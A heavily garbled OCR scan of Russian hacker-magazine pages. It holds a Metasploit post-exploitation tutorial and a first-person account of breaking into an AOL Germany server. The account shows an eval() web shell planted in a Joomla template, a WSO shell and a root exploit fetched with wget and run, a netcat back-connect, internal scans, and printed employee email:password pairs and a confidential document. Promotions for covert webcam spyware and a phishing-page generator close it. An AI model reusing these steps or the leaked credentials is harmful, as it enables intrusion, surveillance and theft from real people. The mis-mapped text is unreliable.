КН05Т5 => 192. 168. 146.0/24 

вдхі1і*гу( ) > 5*1 РОЕТ* 13 9,135,445 
Р0ГГ5 1 19 р 135 И 45 
тг* аих-ПіагуС ) ^ гигс 

192 Л .вВ. 146 Л: 13 5 - ТСР ОРЕМ 
192. 168. 146 Л 1445 - ТСР ОРЕМ 
192. 168. 146. 12139 - ТСР ОРЕМ 
192. 168 .146.2:135 - ТСР ОРЕМ 
192.168.146.2:445 - ТСР ОРЕМ 



Сканим подсетку через Меіегргеіег 



тую версию ІЕ по НТТР- прото колу. Это на самом деле круто, 
особенно, если ты ломаешь какую-то корпоративную сетку, 
где все сидят за ІЧАТ’ом и с общим файерволом, пропускаю- 
щим только НТТР-трафикс корпоративного прокси-сервера. 
В таком случае ни одна другая нагрузка не поможет, осо- 
бенно если ты не знаешь настройки для прокси. А тут — все 
настройки для прокси и аутентификации на нем (если она 
есть] уже прописаны в ІЕ. 

Создадим нагрузочку и прослушку под нее 
(192.168.0.102:443]: 

тзНрауІоасІ ^іпсЗом'з/шеЦегргеісег/геѵегзе_Ь.Цір 
РХНОЗТ=192 .168 . О . 102 РХРОКТ=443 РХШІ = / X > 
ге^1шеСег102 . ехе 

тз:Е> изе ехрІоіС/тиІСі/ІтапсІІег 
тз:Е> ехріоіс -р міпс!отлгз/теЦегргеЦег/геѵегзе_ 
ЬССр -о РХНОЗТ=192 . 168 .0.102 , РХРОКТ=443 , РХІІ 
КІ = / 



Причем, если раньше РаззіѵеХ работал только под ІЕ6, то 
теперь все окей и с ІЕ7/8. 

Далее об обычных шеллах. Обычный шелл — это, конечно, 
хорошо, но если ты юзал теіегргеіег, то тебе захочется к 
нему вернуться. 

И теперь у нас есть такая возможность. Предположим у 
нашей жертвы (192.168.0.101] уже повешен обычный бинд- 
шелл на 5678 порту. 
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Плагин ѴѴМАР в действии. Не очень показательно, 
но работает :) 



Собираем инфу о системе по средствам скрипта 
ѵѵіпепит.гЬ 

Коннектимся к нему из М5Р: 

тзР> изе ехрІоіІі/шиІІіі/ЬапсіІег 

тзР> ехріоіь -р ѵ^іпсіо^з/з]іе11_Ьіп(і_1іср -о 

КНОЗТ=192 .168 . О . 101 ,КРОКТ=5678 

Хотелось бы сказать, что следующей командой мы превращаем обычный 
шелл в теіегргеіег, да не судьба. М5Р просто подгружает бэкконект 
теіегргеіег и, запустив его, создает еще одну сессию (создается еще 
одно соединение]. Хотя это тоже не плохо. Но чтобы все работало, нам 
надо установить глобальные значения своего хоста (куда коннектиться 
реверсу], а потом уже «обновить» сессию (предположим, она у нас «1»]: 



тзР> гоиСе асісі 192.168.146.0 255.255.255.0 1 



К сожалению, птар не захотел пользоваться этим маршрутом — видимо, 
не такая глубокая интеграция пока что. Но обычными модулями, сплои- 
тами и сканерами спокойно (то есть без каких-либо спецнастроек] можно 
пользоваться для развития атаки (см. рисунок] — всю маршуртизацию 
берет на себя М5Р. 

Так как у определенных хостов может быть ограничен доступ во внеш- 
нюю сеть (где находимся мы], то для связи с ними можно использовать 
портфорвардинг на уже уделанной жертве, благо, те1:егрге1:ег это умеет: 



сказывать, насколько он хорош (и следов после себя почти не оставляет, 
и работает в сбгооРе] и функционален (встроенные хак-тулзы, модифи- 
кация реестра и файловой системы, миграция по процессами и токенам, 
маршрутизация] у меня нет желания :]. 

Давай предположим, что мы получили доступ к одному из компов 
(192.168.146.129] в корпоративой сети и мы (192.168.0.102] хотим развить 
наш успех — просканить подсетку и поиметь еще что-нибудь. 

Добавляем маршрут (подсетка, ее маска, сессия для маршрутизации] в 
тзіюопзоГе: 



тз^> зеСд ЬНОЗТ 192.168.0.102 
шз^> зеСд ЬРОКТ 6666 
тз^> зеззіопз -и 1 



теСегргеСег> рогСіллкі асісі -1 8008 -р 2222 -г 
192.168.0.101 



В итоге избавляемся от кучи напрягов и ограничений обычного шелла. 
Кстати, о ппеіегргеіег’е. Его уже давно пытаются перенести на другие 
платформыЦіпих, Масоз], но пока как-то там не все гладко. Но, все-таки, 
есть хорошие новости: в каком-то виде теіегргеіюг был перенесен на 
РНР! В «каком-то», потому что не все функции позволяет реализовать 
РНР, но основное уже доступно. Так что можно залить на заваленный 
сервак и побаловаться таким крутым шеллом. Теперь поговорим о 
собственной «безопасности». Пока что большинство модулей М5Р не 
поддерживают прокси, особенно это относится к боевым нагрузкам. Ведь 
мы же не хотим, чтобы нас вычислили :). Потому вспомним олдскульную 
фичу — портфорвардинг. Предположим наш сервак с М5Р, ожидающий 
бэкконнект шеллов, находится по адресу «192.168.0.103:5555». Тогда на 
подставном сервачке на 80 порту мы вешаем пе1;саЕ 

псаС --зіі-ехес "псаС 192.168.0.103 5555" -1 80 
--кеер-ореп 

А в рауіоасі’ах мы прописываем ІР (или 0Ы5] и порт подставного сервака. 
Кстати, пеісаі; поддерживает 551, так что можно и зашифровать трафик, 
если сам шелл этого не позволяет. 

ПОСТЭКСПЛУАТАЦИЯ 

Да, теперь переходим к самому вкусному — постэкслуатации и 
теТегргеТег’у. Надеюсь, ты знаком с теТегргеТег’ом, потому как рас- 



Теперь прописываем в рауіоасі’ах сплоитов І_Н05Т=192.168.146.129, 
І_РОРТ=8008, и все будет тип-топ. 

МеТегргеТег имеет чудесную возможность — автоматизация действий по- 
средством руби-скриптов. Это реально круто. Посмотреть существующие 
скрипты можно в тзОѴзсгірТзѴтеТегргеТег, во время юзания — пишем 
гип и дважды ТаЬ (для тех, кто не в теме :]. Запускать скрипты можно 
либо ручками через команду гип, либо указав переменную АиТоРип5сгір1; 
или Іпіба[Аи1:оРип5сгір1; при конфиге нагрузке/сервера. Вторая перемен- 
ная — выполняется до запуска шелла, первая — после. 

Скриптов входящих в поставку уже много, из самого стандартного: 
ѵѵіпепит — быстренько собирается вся инфа о системе от сетевых на- 
строек до установленного ПО и хешей; 

регзізіепсе, теізѵс — прописывает ппеіегргеіег на автозапуск в реестре 
или как сервис; 

деісоипіегтеазиге — отключает файер, может убивать процессы раз- 
нообразных антивирусов и файерволов. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

В статье я постарался описать что-то новое (во всяком случае, для 
русскоязычных источников) и при этом обо всех стадиях взлома, так что, 
надеюсь, она будет тебе полезна. К тому же, родилось пара гениальных 
идей, которые осталось лишь реализовать, да нашлось пару гадких багов 
в МР5, которые, я надеюсь, будут устранены к выходу номера. В общем, 
творить — это чудесно ! т 
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НЕ! П|К9ЕкМ ршпа™ 




^едневно 



ѴібоРа.ги - рестораны, кафе, бары, кино, мойка машин, массаж или маникюр, 
солярий, обучающие курсы, аквапарк, караоке, прыжки с парашютом, пейнтбол 
и другие развлечения со скидкой до 90%! 



Зайди на наш сайтѵі^осіа.ги и бесплатно подпишись на предложения 
в твоем городе, чтобы первым узнавать о выгодных акциях. 








взлом 



■ ■ Апопутоиз 



НОКАУТ 
ДЛЯ АОІ. 



Получаем привилегии рута на сервере корпорации АОІ. 



Корпорация АОІ. всегда являлась лакомым кусочком для хакеров всех 
возможных мастей. Смотри сам: миллионы зарегистрированных пользователей 
в АІМ, АОІ. Маіі и ІСО, сотни офисов во всех уголках мира, миллиардный 
рынок рекламы и другие ништяки, посмотреть на которые ты сможешь 
прямо с главной страницы аоі.сош (Топ-50 по посещаемости среди сайтов 
во всем интернете). Глядя на все это великолепие, ты не удивишься, что в 
один прекрасный день я натравил свой ХЗрісІег 7.7 на одну из сетей АОІ., 
находящуюся в диапазоне 64.12.0.0 - 64.12.255.255. Вот что из этого вышло... 



ЖЕРТВА ОЕТЕСТЕО 

Из всего обилия айпишников корпорации, проживавших в указанном 
диапазоне, первым делом меня привлек хост аІех-аоІсІе-т1:с02.еѵір.аоІ. 
сот, при ближайшем рассмотрении оказавшийся неким сайтом бНр:// 
аІех.аоЫе с окнами ввода логина и пароля на главной странице. При 
первом же взгляде на ресурс стало ясно, что он работает на СМ5 Зоотіа 
ветки 1.5.x. 

Как известно, одним из лучших на сегодняшний день решений для поис- 
ка уязвимостей в Джумле является входящий в проект 0ѴѴА5Р <Ооот1а! 
ЗесигіТу/ѴиІпегаЬіІМіу Зсаппег» от ребят из УСЫ Еібісаі Наскег Сгоир 
(ссылку на сканер ищи в сносках]. 

Итак, скачав сканер, я запустил его следующим образом: 

С : /Рег1/Ьіп/рег15 . 12 . 1 . ехе С: /ііоотзсап/Зоотзсап.рІ -и 
Ьккр : / /аіех . аоі . сіе 



Через несколько минут я получил примерно следующий результат: 

# Бесіисесі ѵегзіоп гапде із : [1.5.12 — 1.5.14] 

# 14 

Іпко -> Соге: Асітіп Васкепсі Сгозз Зіке Кедиезк 
Рогдегу ѴиІпегаЪіІіку 
Ѵегзіопз еккескесі: 1.0.13 < = 

СЬеск: /аЬтіпізкгаког/ 

Ехріоік: Ік гедиігез ап асЗшіпізкгаког ко Ье Іоддесі іп 
апсі ко Ье кгіскеЬ іпко а зресіаііу сгаккеЬ ѵ^еЬраде. 
ѴиІпегаЫе? Уез 

# 19 

Іпко -> СогеРІидіп: ТіпуМСЕ ТіпуВгоѵ^зег аЬЬоп 
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Содержимое архива с бэкапом 



тиікіріе ѵиІпегаЪіІікіез 
Ѵегзіопз еккескесі: Цоотіа! 1.5.12 

СЬеск : /ріидіпз/есіікогз/кіпутсе/ б зсгіркз/кіпу_тсе/ 
рІидіпз/кіпуЪгсжзег/ 

Ехріоік: Шіііе Цротіа! кеат аппоипсесі опіу Еііе 
Ііріоасі ѵиІпегаЪіІіку , іп каск ккеге аге тапу. Зее: 
кккр : / /члплм. ті1ѵ\Югт. сот/ехрІоікз/9296 
ѴиІпегаЫе? Уез 

Ни одна из найденных «уязвимостей» ни на йоту не помогла мне при- 
близиться к заветной цели взлома. 



ПОМОЩЬ ОТ 0ѴѴА8Р 

Осознав, что через Джумлу мне вряд ли удастся проникнуть на нужный 
сервер, я решил просканировать скрытые от посторонних глаз директо- 
рии и файлы ресурса с помощью еще одного проекта 0ѴѴА5Р — брутфор- 
сера директорий ОігВоозТег (ссылка, опять же, находится в сносках]. 
Запустив программу, я вписал следующие настройки: 




Привилегии рута получены! 



ѵаг $зесгек = ' ЫААдХемХсобВ8м2с1 1 ; 



ѵаг $НюзС = 1 Іосаікозк * ; 
ѵаг $изег = 'аіех'; 



ѵаг $сІЪ = 1 кезк ' 

ѵаг $зткррогк = 
ѵаг $зткризег = 
ѵаг $зткрразз = 
ѵаг $зткрЬ.озк = 

ѵаг $раззѵ\гагс! = 



'465' | 

1 мігхѵагепсігіп ' ; 
1 ВгіезЬеп 1 ; 

' зткр . аоі . сот' ; 

' мб есіко , 1д ' ; 



} 

?> 

Первым делом я залез в почтовый ящик ѵѵігѵѵагепбгіпібаоі.сопп . в кото- 
рый, как оказалось, падали регистрационные данные юзеров аІех.аоЫе. 
Далее логичным показалось попробовать использовать логин и пароль 
от мускула в рбрМуАбтіп, чем я незамедлительно и занялся :). 

Пароль для юзера аіех, конечно же, подошел, так что для дальнейшей 
заливки шелла оставалось два варианта: добавить нового админа в 
Джумлу или сбрутить пароль существующего админа. Я выбрал второй 
вариант. 



Тагдек ШЬ: Ъ.ккр :/ /аіех . аоі . сіе/ ; 

№огк Меккосі: Аико ЗміксЪ. (НЕАБ апсі СЕТ) ; 

ЫишЬег 01 Ткгеасіз : 2 00; 

Зеіеск зкагкіпд оркіопз: Зкапсіагсі зкагк роіпк, Вгике 
Еогсе Бігз, Вгике Еогсе Еііез; 

Еііе ехкепзіоп: ркр . 

Далее я попробовал по очереди брутфорс со всеми словарями, входящи- 
ми в комплект поставки проги. 

Из всех полученных результатов больше всего меня обрадовали следую- 
щие: ./іпІо.рЬр (рбріпію), ./рта (рбрМуАбтіп) и директория ./бпіб, содер- 
жащая в себе три файла (сопбдигаІіоп.рЬр, рЬрМуАбтіп-3.3.2-епдІізЬ.Іаг, 
ѵѵігѵ\/агепбгіп.1аг]. 

Название 80-метрового архива ѵѵігѵѵа гепсігіп.ііаг меня обрадовало, так 
как на главной странице аІех.аоЫе находилась ссылка на ѵѵігѵѵагепсігіп. 
бе, своего рода зеркало аоловского ресурса. 

Скачав указанный архив, я понял, что в нем находится полный бэкап 
нашего сайта :). 

ХРАНИТЕ БЭКАПЫ В СБЕРЕГАТЕЛЬНОЙ КАССЕ! 

В архиве с бэкапом меня более всего заинтересовал файл конфига 
Джумлы сопбдигаІіоп.рЬр, в котором хранились следующие интересные 
вещи: 

<?ркр 

сіазз ЦСопкід { 



БРУТФОРС - БЫСТРО И ЛЕГКО! 

Моей любимой программой для брутфорса различных хешей является 
РаззѵѵогбзРго, которая, в том числе, поддерживает и формат шифрова- 
ния паролей боотіа! — тб5($разз.$5а11:). 

Итак, скачав несколько самых больших словарей из топика ШрУЛогит. 
апІісЬакги/зЬоѵѵіЬгеаб.рЬр?ЩІ3640 и зарядив их в РаззѵѵогбзРго на 
предмет бруга соленого админского хеша б8614с81342Ь79с4ЬаЬ8868656с 
аЬе46:165НКТ9іиоОШѵЛАООбРОупТ6ЕрПНХЬ, я стал терпеливо ждать. 
После нескольких часов брутфорса прога выдала мне пароль для данно- 
го хеша — цѵѵегТугиаог, с которым я успешно и залогинился в аіех. аоі. бе, 
а также в аІех.аоІ.бе/абтіпізТгаІог. 

Кстати, как оказалось, ресурс аіех. аоі. бе создавался одним из работни- 
ков АОІ для координации проведения вечеринки среди сотрудников 
германского отделения корпорации, на нем зарегистрировались и 
входили в курс дела около 450 бывших и настоящих сотрудников АОІ, 
так что далее я незамедлительно принялся заливать шелл с помощью 
правки шаблонов Джумлы :] 

АОІ. ШЗІОЕ 

Шаблон для правки находился в админке по следующему пути: 
«Ехіепзіопз Тетріаію Мападег -> аоі-ехіі -> Ебіі НТМЕ», сам же файл 
шаблона лежал в /баІа/зегѵег5/ѵѵаЫ-о-таІ_аоІ_бе/радез/аІех_аоІ_бе/ 
Іетріаіез/аоі-ехіі/іпбех.рбр. 

В верхушку указанного файла я вставил небольшую кавайную кон- 
струкцию: 



ХАКЕР 09 /140/ 10 



► Об7 







взлом 




Таблица с юзерами .Іоотіа! 




Г-ІВНЫЧНЬѵъінЛ'иігтЛ М ■ С‘№ыУЫпІІр»Л ІМі« Л-І 



гм-.* — Ы у..! ІІГ і лГі | | | Г у $■ иг.- ■ і- 

ОІ мчі, ІГки Н | _ 

Еі Н IX ■ 3 Н*>! Ьсг Ч-ии, Пнпімгі 



І-.‘Зп*г*ІііПІ* Е-^гз+г' -41,4 
1*+і1 ирііЕкі ЙмршЫ: ІЙ. 1ЙИ 



II .г 'міи г і I И '■ іі|,іГ і.ім Гм М|||и1г Е 

ѵи "гпс-Ек" врс Іел га гКс-гк г Ьс 



МІІІНІІ- ГІп іІиІнКик-і 

Ксск чЬс ЕСЛЛПЕГ 4||КІЛР 
№ 4йИіЕп«Л 11м ЕЕІИЧГГ ІІІ1ІІ 



<?рпр I іоотзсап.рі за работой 

еѵаі ( зТгірзІазкез ( $_ЕЕС>БЕЗТ [ааа] ) ) ; 



?> 

Далее к этому делу оставалось набросать небольшой НТМІ_-клиент: 

<Тогт асТіоп= "НТТр : / /аіех . аоі . сІе/ТетрІаТез/аоІ-ехіТ/ 
іпсіех . ркр " теТЬ.осІ= " РОЗТ" > 

<іприТ Туре="ТехТ" пате= " ааа" /> 

<іприТ Туре= " зиЪтіТ " ѵа1ие= " Рші ІТ!" /> 

</Тогт> 



сети наш сервак скрывается под адресом 10.62.134.80. Так что дальше с 
помощью грт я скачал и установил птар: 

грт -ѵШ НТТр : / /птар . огд/с1ізТ/птар-5 . 2 1-1 . ІЗ 86 . грт 

и запустил его следующим образом: 

птар -ѵ -п -зЗ 10.62.134.0/24 



Первым делом с помощью утилиты ѵѵдеі; я залил на сервер ѴѴ50-шелл 
( ЬНрУ/ІюгиіттапІісбаТгиЛбгеасІІОЗІ 55.Ы:тІ. 1 в ту же директорию ГетрІаГез 
под именем 404. рбр и смог с удобством просматривать все файлы и 
директории (кстати, еще один косяк админа заключался в том, что абсо- 
лютно все файлы и директории были открыты на запись]. 

ЕЩЕ ГЛУБЖЕ! 

В директории /баГа/зегѵегз сразу же можно было посмотреть на сайты- 
соседи нашего аІех.аоЫе: ебіЬг.аоІТг, даТаоІ.со.ик, зпз.пехиз.аоі.сот, 
ѵѵаЫ-о-таі.аоЫе, таГпх.аоЫе. Сильно разбираться с их строением 
и значением я не стал, а попросту слил все исходники на винт своего 
дедика, предварительно запаковав весь стафф с помощью следующей 
команды: 

ссЗ /сІаТа/зегѵегз ; Саг сгѵТ /Ттр/І.Тд 2 ./* 

Следующей целью, которую я себе поставил, было получение рута на 
данном сервере, благо, старое и унылое ядро это позволяло: 

Ыпих маНІ-о-таТ . аоі . сіе 2 . 6 . 9-55 . ЕБзтр #1 8МР Егі Арг 
20 17:03:35 ЕБТ 2007 І686 

Для начала мне был необходим интерактивный шелл, получить который 
мне помог банальный перловый Васк-соппесі; к 31337 порту моего деди- 
ка в ѴѴ50 (раздел ЫеТл/огк) и ставший притчей во языцех ЫеЮаІ: 

с : /пеТсаТ/пс . ехе -1 -р 31337 

Получив искомое, я принялся за поиски нужного рутового сплоита 
на бНр://ѵѵ\л/ѵѵ.ехр[оіБбЬ.сопп . Таковым оказался, опять же, немецкий 
«ѵѵипбегбаг етрогіит» ( Ь^рТ/ѵѵѵѵѵѵ.дгзесигкѵ.пеД-зрепбег/ѵѵипбегЬаг 
етрогіитІдД . 

Далее, после выполнения нехитрой последовательности команд, я и по- 
лучил заветное «иісІ=0(гооі] дісІ=0(гооі] дгоирз=1 1 560(ЬМрсІ)»: 

мдеТ НТТр : / /тт. дгзесигіТу . пеТ/~зрепс!ег/ттс1егЪаг_ 
етрогіит . Тдг ; Таг хг Тѵ тіпсЗегЬаг_етрогіит . Тд 2 ; сктосі 
0777 . / *; . /тіпсЗегЬаг_етрогіит. зЬ 

ИНТЕРЕСНОЕ 

После получения привилегий рута мне почему-то захотелось просканить 
внутреннюю сетку. Для этого я выполнил команду іісопіід и узнал, что в 



Сейчас я не буду рассказывать о своих дальнейших действиях с сеткой 
немецкого А01_, а покажу лишь парочку самых интересных отчетов 
сканера: 

№пар зсап герогТ Тог 10.62.134.89 
НозТ із ир (0.00013з ІаТепсу) . 

ЫоТ зЬ.оѵт: 986 сіозесі рогТз 



РОЕТ 


8 ТАТЕ 


ЗЕЕѴІСЕ 


22 / Тер 


ореп 


ззЪ. 


80/Тср 


ореп 


НТТр 


135/Тср 


ореп 


тзгрс 


445 /Тер 


ореп 


тісгозоТТ-сІз 


1024/Тср 


ореп 


ксЗт 


1041 /Тер 


ореп 


ипкпоѵт 


1051 /Тер 


ореп 


орТіта-ѵпеТ 


1311/Тср 


ореп 


гхтоп 


1801/Тср 


ореп 


хшкпоѵт 


2099/Тср 


ореп 


ипкпоѵт 


2103 /Тер 


ореп 


2 еркуг-сІТ 


2105/Тср 


ореп 


екіодіп 


2107/Тср 


ореп 


ипкпоѵт 


3389/Тср 


ореп 


тз-Тегт-зегѵ 



МАС Аскігезз: 00 : 18 : 8В : 74 : 52 : 6Е (Беіі) 

№пар зсап герогТ Тог 10.62.134.96 
НозТ із ир (0.00013з ІаТепсу). 



БоТ зЬоѵт 


: 971 


сіозесі рогТз 


РОЕТ 


ЗТАТЕ 


ЗЕЕѴІСЕ 


22/Тср 


ореп 


ззк 


88/Тср 


ореп 


кегЬегоз-зес 


135/Тср 


ореп 


тзгрс 


139/Тср 


ореп 


пеТЬіоз-ззп 


389/Тср 


ореп 


ісіар 


445/Тср 


ореп 


тісгозоТТ-сіз 


464/Тср 


ореп 


краззѵѵс15 


593 /Тер 


ореп 


НТ Тр - грс - ертар 


636/Тср 


ореп 


Ісіарззі 


1024/Тср 


ореп 


ксЗт 


1025/Тср 


ореп 


БЕЗ-ог-ІІЗ 


1027/Тср 


ореп 


ИЗ 


107 8 /Тер 


ореп 


ипкпоѵт 


1112/Тср 


ореп 


тзді 
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Админка Джумлы 




Ьасксоппес* в ѴѴБО-шелле 



1311/Ьср 


ореп 


гхтоп 


1801/Ьср 


ореп 


ипкпоѵт 


2099/Ьср 


ореп 


ипкпоѵт 


2103/Ьср 


ореп 


геркуг-сІЬ 


2105/Ьср 


ореп 


екіодіп 


2107/Ьср 


ореп 


ипкпоѵт 


3268/Ьср 


ореп 


дІоЬаІсаЬЬЬАР 


3269/Ьср 


ореп 


дІоЪаІсаЬЬЬАРззІ 


3389/Ьср 


ореп 


тз-Ьегт-зегѵ 


9998/Ьср 


ореп 


ипкпоѵт 


13722/Ьср 


ореп 


пеЬЬаскир 


13782 /Ьср 


ореп 


пеЬЬаскир 


13783 /Ьср 


ореп 


пеЬЬаскир 


49152 / Ьср 


ореп 


ипкпоѵт 


49153 /Ьср 


ореп 


ипкпоѵт 



МАС Аскігезз : 00 : 13 : 72 : 5А: ЗЕ : 78 (Ьеіі) 

Как видишь, в А0І_ очень любят продукцию мелкомягкой 
компании :). 

АОІ. СОМРШЕЫИМ 

Закончим на сегодня с многострадальной внутренней 
сеткой А0І_ и продолжим с вытащенными мной из базы 
данных Джумлы логинами и хешами работников корпо- 
рации. 

Как я уже писал выше, РаззѵѵогсІзРго помог мне расшифро- 
вать хеш пароля админа аІех.аоЫе. Но одним админом я не 
ограничился, а зарядил на брут и остальные 450 аккаунтов, 
из которых успешно сбрутились 1 97. 

Далее я стал потихоньку проверять полученные пароли на 
предмет их подходимости к почте аоловцев. 

Вот некоторые интересные работоспособные аккаунты: 

диепЬегзЬааг диепЬегзЬааг@ао1 . сот: кеіпезз 
Ькотазкиск Ькотазкиск@ао1 . сот : зазска 
тс!1геес1от99 тагсс!геѵт11о@ао1 . сот:Мадіс23 
СІаиЫаЬапдѵтІсі СІаисІіаЬапдѵтІсШаоІ . 
сот: Зііѵега 

ЪеЬЬуѵопІоезск ЪеЬЬуѵоп1оезск@ао1 . сот : каппе 
Ріегге РіеггеВепеНШаоІ . сот : ѵѵотЪазЬ 
Тепде Тепде@ао1 . сот: Ьегѵѵіз 
ЬеппуЗеЬкоѵѵ Цеппу8еЬком@ао1 . сот: ѵагіЬа 
ЫіпаКіхепНШаоІ . сот ЫіпаКіхепНШаоІ . 
сот: Ьгаиеге 

ЬеппіЬег2706 т еппіЬегтаЬкез а@ао1 . сот: е1іЬе15 
А.Ѵ.аиз Н. ѵоідЬкк@доод1етаі1 . сот: Ьеіркіпез 
Ькогирр Ьгес1егіскогирр@доод1етаі1 . 




Ішіех о? /сіпііі 

* Р-эгепіРігеііЕРГѵ 

• рЬрМѵАФпш-3. 3.2-сгцІ?Ь.(аг 

> тдасюіЬі^ 

Содержимое директории ./сІпШ 



сот: ѵтзізЬЬаз 

Кгаззоѵткі8аЪіпе@ао1 . сіе КгаззоѵткіЗаЪіпе© 
аоі . сіе : 8оттег44 

песісііе аппеЬЬкагкзепкк@ао1 . сіе : коскг;еіз 
Тгіхі зееЪегЬгіхі@ао1 . Ье : зоттег07 
Ьгіпдазѵаззііікі Ьгіпдазѵаззі1ікі@ао1 . 
сіе :регік1е 

АдпезАВ адпезЪоІРзепккѲаоІ .сіе:Аргі12 008 

Как видишь, пароли просто поражают своей простотой :]. 

В указанных почтовых ящиках находилось очень много 
забавных документов: внутренние аоловские расписки, 
резюме работников, фотографии офисов, адреса, теле- 
фоны, пароли к ебау и раура I (!), статистика и многое 
другое. 

Вот лишь часть одного из внутренних документов с помет- 
кой «Сотрапу Сопббепкаі». 

АОЬ Сегтапу 8ЫАР8НОТ ЗЬММАКУ аз оЬ СОВ 
Баке : [2006-02-11] 

Визіпезз : 

АОЬ 

СЕКМАБУ (АОЬ) 

ЕОК [2006-02-11] 

-Епсііпд МетЬегз 2,687,173 
-КедізЬгаЬіопз 1,824 
-КеасЬіѵаЬіопз 146 
-Оѵегкеасі Сопѵегзіопз 1 
-СапсеІІаЬіопз 1,472 
-ТегтіпаЬіопз 549 
-ЫеЬ Скапде -50 
-Сизкотег Ноигз 7,301,418 
-Токаі Ноигз 7,322,081 

Как видно, в этой статистике содержится полная инфа по 
внутреннему юзерообороту немецкого отделения корпора- 
ции за 2006-02-1 1 :). 

НАПОСЛЕДОК 

На твоих глазах развилась очередная история 
взлома одного из сайтов крупной компании, кото- 
рый произошел из-за банальной безалаберности и 
невнимательности админа. Здесь я могу отметить 
несколько основополагающих факторов: хране- 
ние бэкапа в общедоступном месте, доступность 
рбрМуАсІтіп'а для внешних пользователей, старое 
ядро, открытость файлов и директорий на запись и 
предсказуемые пароли. 

Надеюсь, после прочтения сего опуса ты никогда не повто- 
ришь глупейших ошибок работников А01_ :1.! тг 




> іпіо 

Чтобы защитить 
внутренние 
директории твоего 
сайта от любопытных 
глаз, советую 
в чувствительные 
директории кинуть 
.Ыассезз с одной 
единственной 
строчкой — ОрЬіопз 
+ Іпсіехез. 

А чтобы защитить 
вообще все файлы 
такой директории 
от доступа извне, 
пропиши еще и вот 
это: Огсіег Бепу, 
АІІоѵѵ 

Бепу Ьгот аіі 




НТТР://ѴѴѴШ 



■ I 

> Цпкб 

• ШрУ/уеЬд.пеіЛаЬ/ 
ргСузЛИез.рбр/щот- 
зсап.р — Зоотіа! 
Беси гку/Ѵи [пега ЬіІКу 
Зсаппег 

• ЬирУ/ѵѵѵѵѵѵ.оѵѵазр. 
огд/і псІех.рЬр/ 
Са1едогѵ:0ѴѴА5Р 
РігВизіег Рго]ес1: 

— 0ѴѴА5Р РігВизІег 
Рго]ес1 
• ЬирУ/ѵѵѵѵѵѵ. 
іпзіберго.сот/епд/ 
раззѵуогбзрго.зЫтІ 

— РаззѵѵогсІзРго 
• ЬирУ/ѵѵѵѵѵѵ.ѵѵеЬ- 
Ьаск.ги/сіоѵѵпіоаб/? 
сазе=іпІ : о&до= 

1 00 — ЫеЮаІ; 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



Программа: ВетСат 2 
ОС ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴізІа/2008 5егѵег/7 
Автор: гегізЬ 




Грабим удаленное видео 

Тебе никогда не хотелось последить за своими 
соседями по локалке? Причем, «последить» 
здесьуказано в прямом значении этого слова. 
Забудь о всяческих кейлоггерах, сниферах и 
иже сними, ибо я представляю твоему внима- 
нию замечательную прогу — ВетСат 2, которая 
с легкостью сможет следить за любыми удален- 
ными аудио/видео-устройствами! 

Зацени возможности данной утилиты: 

- Система «клиент -сервер»; 

- Выбор формата видеозахвата (виде- 
оформат, разрешение); 

- Поддержка распространенных КСВ , 
УЦѴ, ЦРЕС - форматов (ВІ_КСВ, УІІУ2 , 
6УѴУ, Ш12, У VI 2 , 142 0, У8 , МЙРС, и 
другие) ; 

- Для декодирования любых форматов не 
требуется устанавливать какие-либо 
дополнительные кодеки; 

- Сжатие видеопотока в ЦРЕС с 
настраиваемой степенью квантования; 

- Выбор формата захвата и передачи 
аудио (количество каналов , частота 
дискретизации) ; 

- Кодирование аудиопотока в ІМА 
АБРСМ; 

- Автоматическая балансировка аудио 
и видеопотоков при нехватке пропуск- 
ной способности канала; 

- Опциональное 2ЫВ-сжатие трафика; 

- Индикаторы использования трафика 
и загрузки процессора на локальной и 
удаленной системе; 

- Опциональная защита сервера паро- 
лем (простая тб5- аутентификация с 
солью) ; 




Описание: 

- Маленький размер приложения (сер- 
вер — 180,5 Кб) ; 

- Адресная книга для серверов с воз- 
можностью импорта и экспорта . 

Кстати, прога предоставляется автором с 
полностью открытыми исходниками, которые 
ты сможешь найти по адресу гебзб.ги/ЬоагсІ. 
рбр?1 : еесІ=ргодгат5&ісІ=20 (также здесь нахо- 
дится и видео с подробнейшим мануалом по 
захватулюбой аудиовизуальной информации с 
помощью ВетСат 2]. 

Программа: аЫѴ^АКЕ 
ОС: *ПІХ/ѴѴІП 

Автор: Ь00гу_с0(13г апсі ТЬе Майа 

А вот и очередной генератор фейков, упрощаю- 
щий процесс фишинга итроллинга юзера 
ушастого. 

Для работы с генератором тебе понадобится 
следующий инструментарий: РНР, Іореп, рабо- 
тающие сокеты и красивый домен, который не 
будет бросаться в глаза :). 

Принцип работы скрипта достаточно прост: 

1 . Скачивается страница, указанная в настройках; 

2 . Все ссылки на странице меняются на ссылки 
самого фейкогенератора; 

3. Меняется адрес обработчика форм; 

4 . Снифер снифает все введенные пользовате- 
лем данные и перенаправляет его на указа н- 
ныйтобой адрес; 

5 . Если же пользователь ничего не введет, то 
его снова переброситна страницу фейка. 

Для начала работы тебе необходимо настроить 
скриптизалитьсгенерированный им файл на 
любой подходящий хост. 

Настройки выглядят следующим образом: 

Еаке козб — подделываемый хост (если 
мы обманываем авторизацию на кббр: // 
ѵлллѵ.таіі . ги , то пишем только «гпаіі. 
ги») ; 

Еаке ракЪ. — путь к подделываемой 
странице (если имеется страни- 



ца авторизации Ьббр : / /зотезібе . 
ги/абшіпка/, то пишем просто «/ 
абтіпка/», а если страница находится 
в корне, то пишем «/») ; 

Еаке зсгірб — адрес подделываемого 
скрипта (если имеется страница авто- 
ризации ЬРбр: //зотезібе. ги/абшіпка/ 
ІодіпЬеге . рЪр , то пишем «ІодіпЬеге. рЬр») ; 
Кебігеск — страница, на которую 
будет перемещен юзер после ввода 
данных ; 

Ьод буре — тип оповещения (таіі или 

Ше) ; 

Етаіі — отснифанные данные шлются на 
мыло, указанное в этом параметре; 
Еііе — отснифанные данные пишутся в 
указанный файл. 

Если утебя есть любые вопросы по работе 
генератора, смело направляй их прямиком 
автору скрипта втопик— ііІрУЛогипп.хека.ги/ 
5боѵѵІ:ЬгеасІ.рЬр?1=142 . 

Программа: ѴКРеддег 
ОС : ѴѴіпсІоѵѵз 2000/ХР/2003 Зегѵег/ 
ѴізІа/2008 Зегѵег/7 
Автор: ОрТік 

А вот и ожидаемая многими тулза — реггер 
аккаунтов ВКонтакте от мембера Античата, 
Оптика. 

ВОЗМОЖНОСТИ ПрОГИ: 

